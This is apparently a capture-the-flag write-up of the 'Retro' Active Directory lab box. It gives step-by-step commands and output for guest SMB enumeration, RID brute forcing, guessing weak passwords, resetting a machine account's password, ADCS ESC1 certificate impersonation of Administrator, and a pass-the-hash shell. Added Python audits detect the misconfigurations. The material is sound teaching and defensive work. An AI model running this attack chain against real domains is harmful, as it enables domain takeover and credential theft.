
Synopsis:
The Retro machine from HTB x Vulnlab was a Windows Active Directory Domain Controller. Initial access was gained by leveraging anonymous SMB enumeration and weak credentials for a ‘trainee’ user. Post-exploitation involved discovering clues in text files, leading to the compromise of a machine account (‘BANKING$’) by guessing its password and then resetting it. This access was then pivotal for privilege escalation via an Active Directory Certificate Services (AD CS) misconfiguration (ESC1), allowing the attacker to request a certificate as the Domain Administrator, ultimately leading to full administrative control over the domain controller.
Active Recon:
The engagement began with an nmap scan to identify open ports and services on the target machine, 10.10.84.158. The scan was executed with the command:
┌──(toothless5143@kali)-[~]
└─$ nmap -sV -Pn --min-rate=5000 10.10.84.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-11 16:55 +06
Nmap scan report for 10.10.84.158
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-11 10:55:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

This revealed the set of services typical of a Windows Domain Controller: DNS (53), Kerberos (88), MSRPC (135), NetBIOS (139), LDAP (389, 3268), LDAPS (636, 3269), SMB (445), and RDP (3389). The nmap output reported the domain as retro.vl0. (later interactions used retro.vl) and confirmed that the host, named DC, was a Windows domain controller.
To facilitate further enumeration using domain names, the host’s IP address was added to the local /etc/hosts file:
┌──(toothless5143@kali)-[~]
└─$ echo "10.10.84.158 retro.vl" | sudo tee -a /etc/hosts
10.10.84.158 retro.vl

Initial interaction with the SMB service was attempted using nxc (NetExec) with Guest credentials:
┌──(toothless5143@kali)-[~]
└─$ nxc smb 10.10.84.158 -u "Guest" -p ""
SMB 10.10.84.158 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.84.158 445 DC [+] retro.vl\Guest:

This confirmed that guest access to SMB on the domain controller was possible with an empty password.
Vulnerability Analysis & Exploitation:
An attempt was made to enumerate domain users using RID brute forcing via impacket-lookupsid with guest credentials:
┌──(toothless5143@kali)-[~]
└─$ impacket-lookupsid guest@retro.vl -no-pass | grep SidTypeUser
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
1000: RETRO\DC$ (SidTypeUser)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1109: RETRO\tblack (SidTypeUser)

A userlist (users.txt) was created containing the candidate usernames:
jburley
HelpDesk
tblack
trainee
DC$
BANKING$

An attempt was then made to authenticate against SMB with these users using null passwords:
┌──(toothless5143@kali)-[~]
└─$ nxc smb retro.vl -u users.txt -p "" --continue-on-success
SMB 10.10.84.158 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.84.158 445 DC [-] retro.vl\jburley: STATUS_LOGON_FAILURE
SMB 10.10.84.158 445 DC [+] retro.vl\HelpDesk: (Guest)
SMB 10.10.84.158 445 DC [-] retro.vl\tblack: STATUS_LOGON_FAILURE
SMB 10.10.84.158 445 DC [-] retro.vl\trainee: STATUS_LOGON_FAILURE
SMB 10.10.84.158 445 DC [-] retro.vl\DC$: STATUS_LOGON_FAILURE
SMB 10.10.84.158 445 DC [-] retro.vl\BANKING$: STATUS_LOGON_FAILURE

Only the HelpDesk name with an empty password produced a result, and NetExec marked it "(Guest)": the DC accepted the logon by mapping it to a Guest session rather than to a HelpDesk credential. This confirmed that null-password authentication as Guest was permitted for the HelpDesk user.
Leveraging this anonymous/guest access, SMB shares were listed using:
┌──(toothless5143@kali)-[~]
└─$ smbclient -L //retro.vl//
Password for [WORKGROUP\toothless5143]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk

This listed several shares, including ADMIN$, C$, IPC$, NETLOGON, Notes, SYSVOL, and crucially a share named Trainees. The Trainees share was accessed anonymously using:
┌──(toothless5143@kali)-[~]
└─$ smbclient //retro.vl/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 03:58:43 2023
.. DHS 0 Wed Jul 26 15:54:14 2023
Important.txt A 288 Mon Jul 24 04:00:13 2023
6261499 blocks of size 4096. 2886079 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

Inside this share, a file named Important.txt was found and downloaded.
The content of Important.txt was revealing:
┌──(toothless5143@kali)-[~]
└─$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins

This strongly suggested that the ‘trainee’ account, found during RID cycling, might have a weak or default password. An attempt to authenticate to LDAP as trainee with the password trainee was successful:
┌──(toothless5143@kali)-[~]
└─$ nxc ldap retro.vl -u "trainee" -p "trainee"
SMB 10.10.84.158 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP 10.10.84.158 389 DC [+] retro.vl\trainee:trainee

This granted the attacker initial authenticated access to the domain.
With credentials for the trainee user, the attacker proceeded to explore accessible resources. The Notes SMB share, previously identified, was accessed using:
┌──(toothless5143@kali)-[~]
└─$ smbclient -U trainee%trainee \\\\retro.vl\\Notes
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 04:03:16 2023
.. DHS 0 Wed Jul 26 15:54:14 2023
ToDo.txt A 248 Mon Jul 24 04:05:56 2023
6261499 blocks of size 4096. 2885371 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

Within the Notes share, a file named ToDo.txt was discovered and downloaded.
The contents of ToDo.txt provided another critical clue:
┌──(toothless5143@kali)-[~]
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James

This message hinted at a “pre created computer account” associated with the old banking software. The BANKING$ account identified earlier via RID cycling (machine accounts end with a ‘$’) became the prime suspect. A computer account pre-created with the legacy “pre-Windows 2000 computer” option keeps, until a machine actually joins with it, a password equal to its own name in lowercase without the trailing ‘$’.
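The attribute pattern such accounts leave behind in the directory is what a defender should hunt for rather than the password itself. The following audit is an added example, not part of the original write-up: it runs over a constructed list of LDAP-style computer records (the real audit would pull sAMAccountName, userAccountControl, pwdLastSet, whenCreated and logonCount for every computer object over LDAP) and flags accounts that look pre-created and never joined. The sample values, including the DC$, BANKING$ and WS01$ records, are constructed for the example.

```python
"""Flag pre-created computer accounts that were never joined.

Added example, not from the original write-up. The records below are
constructed to resemble a directory export; a real audit would read the
same attributes over LDAP for every computer object.
"""

# userAccountControl bits (documented Microsoft values).
ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020          # set by the legacy "pre-Windows 2000 computer" option
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000    # domain controllers

# Constructed sample records (timestamps are illustrative, not from the page).
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "DC$", "userAccountControl": SERVER_TRUST_ACCOUNT,
     "logonCount": 412, "pwdLastSet": "2025-05-01T09:12:00", "whenCreated": "2023-07-23T21:50:00"},
    {"sAMAccountName": "BANKING$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD,
     "logonCount": 0, "pwdLastSet": "2023-07-24T04:00:00", "whenCreated": "2023-07-24T04:00:00"},
    {"sAMAccountName": "WS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "logonCount": 37, "pwdLastSet": "2025-04-20T10:00:00", "whenCreated": "2024-01-05T08:00:00"},
]


def is_precreated_unclaimed(rec):
    """True if the record matches the pre-created, never-joined pattern.

    Indicators: workstation trust account, PASSWD_NOTREQD still set, password
    unchanged since creation and zero logons. Treating pwdLastSet == whenCreated
    as "never changed" is a heuristic; a join resets both the flag and the password.
    """
    uac = rec["userAccountControl"]
    if not uac & WORKSTATION_TRUST_ACCOUNT or uac & ACCOUNTDISABLE:
        return False
    never_joined = rec["logonCount"] == 0 and rec["pwdLastSet"] == rec["whenCreated"]
    return bool(uac & PASSWD_NOTREQD) and never_joined


def audit(records):
    """Return the sAMAccountNames that should be disabled or deleted."""
    return [r["sAMAccountName"] for r in records if is_precreated_unclaimed(r)]


if __name__ == "__main__":
    for name in audit(SAMPLE_COMPUTERS):
        print(f"[!] {name}: pre-created computer account that never joined; disable or delete it")
```

The equivalent live query is an LDAP filter on the two userAccountControl bits, `(&(userAccountControl:1.2.840.113556.1.4.803:=4096)(userAccountControl:1.2.840.113556.1.4.803:=32))`, with the logonCount and pwdLastSet checks applied to the results; the fix is to delete stale pre-created accounts and to stop using the pre-Windows 2000 option when staging machines.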
Lateral Movement:
Based on the hint from ToDo.txt, an attempt was made to authenticate as the BANKING$ machine account using a guessed password. The password “banking” proved successful:
┌──(toothless5143@kali)-[~]
└─$ nxc smb retro.vl -u "BANKING$" -p "banking"
SMB 10.10.84.158 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.84.158 445 DC [+] retro.vl\BANKING$:banking

This granted access as the BANKING$ machine account. A pre-created computer account is allowed to change its own password on first login, so to ensure persistent, known access the attacker changed the BANKING$ password to Password123 using impacket-changepasswd:
┌──(toothless5143@kali)-[~]
└─$ impacket-changepasswd -p rpc-samr retro.vl/BANKING\$@retro.vl -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

“banking” was supplied as the current password when prompted, and the change succeeded.
Privilege Escalation:
With control over the BANKING$ machine account and its new password Password123, the attacker focused on Active Directory Certificate Services (AD CS) for privilege escalation. Certipy was used to enumerate AD CS configurations:
┌──(toothless5143@kali)-[~]
└─$ certipy-ad find -target 10.10.84.158 -u BANKING$ -p Password123
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Saved BloodHound data to '20250511211902_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250511211902_Certipy.txt'
[*] Saved JSON output to '20250511211902_Certipy.json'

The relevant excerpt of the saved text output, for the 'RetroClients' template:

    Object Control Permissions
      Owner                           : RETRO.VL\Administrator
      Write Owner Principals          : RETRO.VL\Domain Admins
                                        RETRO.VL\Enterprise Admins
                                        RETRO.VL\Administrator
      Write Dacl Principals           : RETRO.VL\Domain Admins
                                        RETRO.VL\Enterprise Admins
                                        RETRO.VL\Administrator
      Write Property Principals       : RETRO.VL\Domain Admins
                                        RETRO.VL\Enterprise Admins
                                        RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                            : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

The finding indicated that 'RETRO.VL\\Domain Computers' (of which BANKING$ is a member) could enroll in the 'RetroClients' certificate template, that the template let the enrollee supply the subject (and therefore the Subject Alternative Name, SAN), and that it carried a client-authentication EKU. Those properties together, with no manager approval or authorised signature required, are the ESC1 pattern: any principal able to enroll can request a certificate naming an arbitrary user and then authenticate as that user.
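Certipy evaluates these conditions for you, but seeing them spelled out makes the remediation obvious. The following is an added example and is neither the write-up's code nor Certipy's: it checks constructed template records against the ESC1 conditions and contrasts a template shaped like RetroClients with a corrected copy. The attribute values for RetroClients are assumed from the description above, and the `enroll_principals` list is a simplification of the enrollment permissions that really live in the template's security descriptor.

```python
"""Check certificate templates for the ESC1 conditions.

Added example, not from the original write-up or from Certipy. Template
records are constructed; a real audit would read them from
CN=Certificate Templates,CN=Public Key Services,CN=Services,<configuration NC>.
"""

# msPKI-Certificate-Name-Flag bit: the requester may supply the subject / SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request waits for manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let a certificate be used for domain logon as the named user.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

# Groups whose enrollment right makes a template reachable by low-privileged principals.
LOW_PRIV_GROUPS = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone"}


def esc1_findings(template):
    """Return the ESC1 conditions the template meets; all four together are the finding."""
    conds = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        conds.append("enrollee supplies subject")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list means any purpose
        conds.append("allows client authentication")
    no_approval = not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
    if no_approval and template["msPKI-RA-Signature"] == 0:
        conds.append("no manager approval or authorized signature")
    if LOW_PRIV_GROUPS & set(template["enroll_principals"]):
        conds.append("low-privileged principals can enroll")
    return conds


def is_esc1(template):
    return len(esc1_findings(template)) == 4


# Constructed: a template shaped like the RetroClients finding in the write-up.
RETRO_CLIENTS = {
    "name": "RetroClients",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll_principals": ["Domain Computers", "Domain Admins"],
}

# The same template after remediation: the CA builds the subject from AD
# (flag cleared) and every request requires CA manager approval.
RETRO_CLIENTS_FIXED = dict(RETRO_CLIENTS, **{
    "msPKI-Certificate-Name-Flag": 0,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
})

if __name__ == "__main__":
    for t in (RETRO_CLIENTS, RETRO_CLIENTS_FIXED):
        print(t["name"], "ESC1" if is_esc1(t) else "not ESC1", esc1_findings(t))
```

Either fix on its own breaks the chain: clearing the enrollee-supplies-subject flag stops the requester choosing the UPN, and manager approval stops an unreviewed request from being issued at all. Restricting enrollment to the group that actually needs the template is the third, complementary control.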
This ESC1 vulnerability was exploited by requesting a certificate as the BANKING$ user but specifying the User Principal Name (UPN) of [email protected] in the certificate request. The command used was:
┌──(toothless5143@kali)-[~]
└─$ certipy-ad req -username BANKING$ -password Password123 -target-ip 10.10.84.158 -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

A certificate, administrator.pfx, was issued for administrator@retro.vl. Note the “Certificate has no object SID” line: the certificate carries only the attacker-chosen UPN and lacks the SID security extension that domain controllers use for strong certificate mapping (KB5014754). Once strong mapping is enforced, a certificate like this is rejected at logon; its acceptance in the next step shows the DC was still in compatibility mode.
This certificate was then used to authenticate as the Administrator and obtain a Kerberos Ticket Granting Ticket (TGT):
┌──(toothless5143@kali)-[~]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'retro.vl' -dc-ip 10.10.84.158
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': 252fac<REDACTED>0368389

This step also retrieved the NT hash of the administrator@retro.vl account: 252fac<REDACTED>0368389.
Finally, with the Administrator’s NTLM hash (252fac<REDACTED>0368389), a remote shell was obtained on the domain controller using Evil-WinRM:
┌──(toothless5143@kali)-[~]
└─$ evil-winrm -i retro.vl -u administrator -H 252fac<REDACTED>0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

This gave the attacker full administrative access to the domain controller, completing the compromise of the Retro box and the retrieval of the flag.
Signing out,
- Toothless

